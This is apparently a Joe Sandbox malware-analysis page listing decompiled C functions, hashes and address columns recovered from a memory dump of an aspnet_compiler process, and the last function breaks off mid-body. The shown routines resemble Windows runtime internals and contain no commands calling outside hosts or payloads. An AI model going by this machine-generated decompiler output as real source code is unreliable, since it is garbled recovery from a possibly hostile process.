                                                                                        0x011f44b9
                                                                                        0x011f44bc
                                                                                        0x011f44cd
                                                                                        0x011f44d3
                                                                                        0x011f44d6
                                                                                        0x011f44e1
                                                                                        0x011f44e1
                                                                                        0x011f44e6
                                                                                        0x011f44e8
                                                                                        0x011f44fb
                                                                                        0x011f44fb
                                                                                        0x011f44e8
                                                                                        0x00000000
                                                                                        0x0119aa5e
                                                                                        0x011f4476
                                                                                        0x0119aa42
                                                                                        0x0119aa46
                                                                                        0x0119aa48
                                                                                        0x0119aa4c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e564d84565ea58bb3787cfbe2b14eeeaa9b530489ac6fcc91a169aa54a660d6d
                                                                                        • Instruction ID: 805684334ddc1011958a40b2bdb62496b4202c64c96180377597b477db900c5f
                                                                                        • Opcode Fuzzy Hash: e564d84565ea58bb3787cfbe2b14eeeaa9b530489ac6fcc91a169aa54a660d6d
                                                                                        • Instruction Fuzzy Hash: 4131F571A0021AABCF199F68DD81ABFB7B9EF44700F01406DF901E7250E7389D11CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D8EC7 Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E011D8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x128d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E011C4E70(0x12886e4, 0x11d9490, 0, 0);
					if( *0x12853e8 > 5 && E011D8F33(0x12853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x12853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x12853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x117bc46;
						_t48 = E01217B9C(0x12853e8, 0x117bc46, _t67, 0x12853e8, _t70,  &_v140);
					}
				}
				return E011DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                        0x011d8ec7
                                                                                        0x011d8ed9
                                                                                        0x011d8edc
                                                                                        0x011d8ee6
                                                                                        0x011d8ee9
                                                                                        0x011d8eee
                                                                                        0x011d8efc
                                                                                        0x011d8f08
                                                                                        0x01211349
                                                                                        0x01211353
                                                                                        0x0121135d
                                                                                        0x01211366
                                                                                        0x0121136f
                                                                                        0x01211375
                                                                                        0x0121137c
                                                                                        0x01211385
                                                                                        0x01211390
                                                                                        0x01211391
                                                                                        0x0121139c
                                                                                        0x0121139d
                                                                                        0x012113a6
                                                                                        0x012113ac
                                                                                        0x012113b2
                                                                                        0x012113b5
                                                                                        0x012113bc
                                                                                        0x012113bf
                                                                                        0x012113c2
                                                                                        0x012113c5
                                                                                        0x012113c8
                                                                                        0x012113cb
                                                                                        0x012113ce
                                                                                        0x012113d1
                                                                                        0x012113d4
                                                                                        0x012113d7
                                                                                        0x012113da
                                                                                        0x012113dd
                                                                                        0x012113e0
                                                                                        0x012113e3
                                                                                        0x012113e6
                                                                                        0x012113e9
                                                                                        0x012113f6
                                                                                        0x01211400
                                                                                        0x01211400
                                                                                        0x011d8f08
                                                                                        0x011d8f32

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e6def8e92db807088e05317dbef5d73ccce46541ea3dc0ed4e66d4bc7e0a179
                                                                                        • Instruction ID: 1da8980c6107a6cc0aa633a923495fa34eab3092a4352fa1db6480a1767f1555
                                                                                        • Opcode Fuzzy Hash: 9e6def8e92db807088e05317dbef5d73ccce46541ea3dc0ed4e66d4bc7e0a179
                                                                                        • Instruction Fuzzy Hash: 1D41AFB1D013189EDB24CFAAD981AADFBF8FB48710F5081AEE509A7640E7745A84CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CE730 Relevance: .1, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E011CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E011D9670() < 0) {
					E011EDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1287b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L011B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M011CE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                        0x011ce730
                                                                                        0x011ce736
                                                                                        0x011ce738
                                                                                        0x011ce73d
                                                                                        0x011ce73e
                                                                                        0x011ce740
                                                                                        0x011ce749
                                                                                        0x011ce765
                                                                                        0x011ce76a
                                                                                        0x011ce76b
                                                                                        0x011ce76c
                                                                                        0x011ce76d
                                                                                        0x011ce76e
                                                                                        0x011ce76f
                                                                                        0x011ce775
                                                                                        0x011ce777
                                                                                        0x011ce77e
                                                                                        0x0120b675
                                                                                        0x011ce784
                                                                                        0x011ce784
                                                                                        0x011ce789
                                                                                        0x011ce7a8
                                                                                        0x011ce7ac
                                                                                        0x011ce807
                                                                                        0x011ce7ae
                                                                                        0x011ce7ae
                                                                                        0x011ce7b1
                                                                                        0x011ce7b4
                                                                                        0x011ce7b9
                                                                                        0x011ce7c0
                                                                                        0x011ce7c4
                                                                                        0x011ce7ca
                                                                                        0x011ce7cc
                                                                                        0x00000000
                                                                                        0x011ce7d3
                                                                                        0x011ce7d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ce7ff
                                                                                        0x011ce802
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ce7f9
                                                                                        0x011ce7fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ce7f3
                                                                                        0x011ce7f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ce7ed
                                                                                        0x011ce7f0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ce7e7
                                                                                        0x011ce7ea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120b685
                                                                                        0x0120b688
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120b682
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ce7cc
                                                                                        0x011ce7d9
                                                                                        0x011ce7dc
                                                                                        0x011ce7de
                                                                                        0x011ce7de
                                                                                        0x011ce7ac
                                                                                        0x011ce7e4
                                                                                        0x011ce74b
                                                                                        0x011ce751
                                                                                        0x011ce759
                                                                                        0x011ce761
                                                                                        0x011ce761

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6909be2f959e7299749323cfb62c3a7e67dd7651606ba6afd67f0201b248ebc5
                                                                                        • Instruction ID: a98a1815da63f368505e64747ab8543135daa666eca39af1a1c349d6afd94d82
                                                                                        • Opcode Fuzzy Hash: 6909be2f959e7299749323cfb62c3a7e67dd7651606ba6afd67f0201b248ebc5
                                                                                        • Instruction Fuzzy Hash: 19318D75A14249EFD708CF58D845B9ABBE8FB18714F14826AF904CB341E731ED80CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CBC2C Relevance: .1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 67%
                                                                                        			E011CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1286100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E011B2280(0xd, 0x5c9f1a0);
				_t41 =  *0x12860f8; // 0x0
				if(_t41 != 0) {
					 *0x12860f8 =  *_t41;
					 *0x12860fc =  *0x12860fc + 0xffff;
				}
				E011AFFB0(_t41, 0x800, 0x5c9f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x12860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L011B4620(0x1286100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1286100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                        0x011cbc36
                                                                                        0x011cbc42
                                                                                        0x011cbc45
                                                                                        0x011cbc4a
                                                                                        0x011cbd35
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011cbc50
                                                                                        0x011cbc50
                                                                                        0x011cbc58
                                                                                        0x011cbc5a
                                                                                        0x011cbc60
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120a4f2
                                                                                        0x0120a4f6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120a4fc
                                                                                        0x011cbc79
                                                                                        0x011cbc7e
                                                                                        0x011cbc86
                                                                                        0x011cbd16
                                                                                        0x011cbd20
                                                                                        0x011cbd20
                                                                                        0x011cbc8d
                                                                                        0x011cbc94
                                                                                        0x011cbcbd
                                                                                        0x011cbcca
                                                                                        0x011cbccb
                                                                                        0x011cbccc
                                                                                        0x011cbccd
                                                                                        0x011cbcce
                                                                                        0x011cbcd4
                                                                                        0x011cbcea
                                                                                        0x011cbcee
                                                                                        0x011cbcf2
                                                                                        0x011cbd00
                                                                                        0x011cbd04
                                                                                        0x00000000
                                                                                        0x011cbc96
                                                                                        0x011cbcab
                                                                                        0x011cbcaf
                                                                                        0x011cbd2c
                                                                                        0x011cbd2c
                                                                                        0x011cbd09
                                                                                        0x00000000
                                                                                        0x011cbd09
                                                                                        0x011cbcb1
                                                                                        0x011cbcb5
                                                                                        0x011cbcbb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011cbcbb

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1180eba8200d074ccc533e8b3fe8ea69282aaadf9db06fc077c1e4fe28ccaca1
                                                                                        • Instruction ID: f55b61dcd0b95d30812bde19f6e3ca2cd8ab259c7058f7ec78122c1436967eae
                                                                                        • Opcode Fuzzy Hash: 1180eba8200d074ccc533e8b3fe8ea69282aaadf9db06fc077c1e4fe28ccaca1
                                                                                        • Instruction Fuzzy Hash: CA313132A056068FCB15DF58E4817BA33B4FF28754F050078ED04DB246E770DD068B8A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01199100 Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 76%
                                                                                        			E01199100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x126f6e8);
				E011ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E012688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E011ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x12886c0; // 0xbc07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x12886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E011B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E012688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E011DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x128b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x12884c0;
										if(_t69 >=  *0x12884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01269063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0119922A(_t82);
							_t53 = E011B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01268B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x12886c0; // 0xbc07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x12886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x12886bc;
										_t72 = 0x12886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01199240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x12886c4;
									_t72 = 0x12886c0;
									L18:
									E011C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                        0x01199100
                                                                                        0x01199100
                                                                                        0x01199100
                                                                                        0x01199100
                                                                                        0x01199102
                                                                                        0x01199107
                                                                                        0x0119910c
                                                                                        0x01199110
                                                                                        0x01199115
                                                                                        0x01199136
                                                                                        0x01199143
                                                                                        0x011f37e4
                                                                                        0x011f37e4
                                                                                        0x01199149
                                                                                        0x0119914e
                                                                                        0x0119914e
                                                                                        0x01199117
                                                                                        0x0119911d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0119911f
                                                                                        0x01199125
                                                                                        0x00000000
                                                                                        0x01199151
                                                                                        0x01199158
                                                                                        0x0119915d
                                                                                        0x01199161
                                                                                        0x01199168
                                                                                        0x011f3715
                                                                                        0x00000000
                                                                                        0x0119916e
                                                                                        0x0119916e
                                                                                        0x01199175
                                                                                        0x01199177
                                                                                        0x0119917e
                                                                                        0x0119917f
                                                                                        0x01199182
                                                                                        0x01199182
                                                                                        0x01199187
                                                                                        0x01199187
                                                                                        0x0119918a
                                                                                        0x0119918d
                                                                                        0x0119918f
                                                                                        0x01199192
                                                                                        0x01199195
                                                                                        0x01199198
                                                                                        0x01199198
                                                                                        0x01199198
                                                                                        0x0119919a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f371f
                                                                                        0x011f3721
                                                                                        0x011f3727
                                                                                        0x011f372f
                                                                                        0x011f3733
                                                                                        0x011f3735
                                                                                        0x011f3738
                                                                                        0x011f373b
                                                                                        0x011f373d
                                                                                        0x011f3740
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3746
                                                                                        0x011f3749
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f374f
                                                                                        0x011f3751
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3757
                                                                                        0x011f3759
                                                                                        0x011f375c
                                                                                        0x011f375c
                                                                                        0x011f375e
                                                                                        0x011f375e
                                                                                        0x011f3761
                                                                                        0x011f3764
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3766
                                                                                        0x011f3768
                                                                                        0x011f37a3
                                                                                        0x011f37a3
                                                                                        0x011f37a5
                                                                                        0x011f37a7
                                                                                        0x011f37ad
                                                                                        0x011f37b0
                                                                                        0x011f37b2
                                                                                        0x011f37bc
                                                                                        0x011f37c2
                                                                                        0x011f37c2
                                                                                        0x011f37b2
                                                                                        0x01199187
                                                                                        0x01199187
                                                                                        0x0119918a
                                                                                        0x0119918d
                                                                                        0x0119918f
                                                                                        0x01199192
                                                                                        0x01199195
                                                                                        0x00000000
                                                                                        0x01199195
                                                                                        0x00000000
                                                                                        0x01199187
                                                                                        0x011f376a
                                                                                        0x011f376a
                                                                                        0x011f376c
                                                                                        0x011f376c
                                                                                        0x011f376f
                                                                                        0x011f3775
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3777
                                                                                        0x011f3779
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f3782
                                                                                        0x011f3787
                                                                                        0x011f3789
                                                                                        0x011f3790
                                                                                        0x011f3790
                                                                                        0x011f378b
                                                                                        0x011f378b
                                                                                        0x011f378b
                                                                                        0x011f3792
                                                                                        0x011f3795
                                                                                        0x011f3795
                                                                                        0x011f3798
                                                                                        0x011f3798
                                                                                        0x011f379b
                                                                                        0x011f379b
                                                                                        0x011991a3
                                                                                        0x011991a9
                                                                                        0x011991b0
                                                                                        0x011991b4
                                                                                        0x011991b4
                                                                                        0x011991bb
                                                                                        0x011991c0
                                                                                        0x011991c5
                                                                                        0x011991c7
                                                                                        0x011f37da
                                                                                        0x011991cd
                                                                                        0x011991cd
                                                                                        0x011991cd
                                                                                        0x011991d2
                                                                                        0x011991d5
                                                                                        0x01199239
                                                                                        0x01199239
                                                                                        0x011991d7
                                                                                        0x011991db
                                                                                        0x011991e1
                                                                                        0x011991e7
                                                                                        0x011991fd
                                                                                        0x01199203
                                                                                        0x0119921e
                                                                                        0x01199223
                                                                                        0x00000000
                                                                                        0x01199223
                                                                                        0x01199205
                                                                                        0x01199208
                                                                                        0x0119920c
                                                                                        0x01199214
                                                                                        0x01199214
                                                                                        0x011991e9
                                                                                        0x011991e9
                                                                                        0x011991ee
                                                                                        0x011991f3
                                                                                        0x011991f3
                                                                                        0x011991f3
                                                                                        0x011991e7
                                                                                        0x00000000
                                                                                        0x011991db
                                                                                        0x01199187
                                                                                        0x01199168

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab79d950caeffba53cc4cc5622e2f0a03f6a9ce85f524f4c645cc7267a5dace2
                                                                                        • Instruction ID: 99f29dec9c65691477266da6f3769c370585de6815a6ed1d7627e734a81ead3b
                                                                                        • Opcode Fuzzy Hash: ab79d950caeffba53cc4cc5622e2f0a03f6a9ce85f524f4c645cc7267a5dace2
                                                                                        • Instruction Fuzzy Hash: 7A31C5B5A11649DFEF2DDB6CC0887ACBBF1BB58368F18816DC52467281C330A980C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C1DB5 Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 60%
                                                                                        			E011C1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E011BF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L011B4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E011BF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
